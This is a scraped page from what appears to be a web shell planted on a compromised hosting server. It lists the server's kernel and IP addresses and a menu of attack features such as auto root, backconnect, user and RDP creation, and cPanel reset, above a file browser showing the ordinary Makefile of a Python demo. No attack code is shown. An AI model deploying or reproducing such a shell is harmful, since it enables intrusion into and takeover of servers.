Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.128.171.192
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib64 /
python2.7 /
Demo /
pysvr /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
1.31
KB
-rw-r--r--
README
325
B
-rw-r--r--
pysvr.c
8.23
KB
-rw-r--r--
pysvr.py
3.35
KB
-rwxr-xr-x
pysvr.pyc
3.79
KB
-rw-r--r--
pysvr.pyo
3.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# Makefile for 'pysvr' application embedding Python. # Tailored for Python 1.5a3 or later. # Some details are specific for Solaris or CNRI. # Also see ## comments for tailoring. # Which C compiler CC=gcc ##PURIFY=/usr/local/pure/purify LINKCC=$(PURIFY) $(CC) # Optimization preferences OPT=-g # Which Python version we're using VER=2.2 # Expressions using the above definitions PYVER=python$(VER) # Use these defs when compiling against installed Python ##INST=/usr/local ##PYC=$(INST)/lib/$(PYVER)/config ##PYINCL=-I$(INST)/include/$(PYVER) -I$(PYC) ##PYLIBS=$(PYC)/lib$(PYVER).a # Use these defs when compiling against built Python PLAT=linux PYINCL=-I../../Include -I../../$(PLAT) PYLIBS=../../$(PLAT)/lib$(PYVER).a # Libraries to link with -- very installation dependent # (See LIBS= in Modules/Makefile in build tree) RLLIBS=-lreadline -ltermcap OTHERLIBS=-lnsl -lpthread -ldl -lm -ldb -lutil # Compilation and link flags -- no need to change normally CFLAGS=$(OPT) CPPFLAGS=$(PYINCL) LIBS=$(PYLIBS) $(RLLIBS) $(OTHERLIBS) # Default port for the pysvr application PORT=4000 # Default target all: pysvr # Target to build pysvr pysvr: pysvr.o $(PYOBJS) $(PYLIBS) $(LINKCC) pysvr.o $(LIBS) -o pysvr # Target to build and run pysvr run: pysvr pysvr $(PORT) # Target to clean up the directory clean: -rm -f pysvr *.o *~ core
Close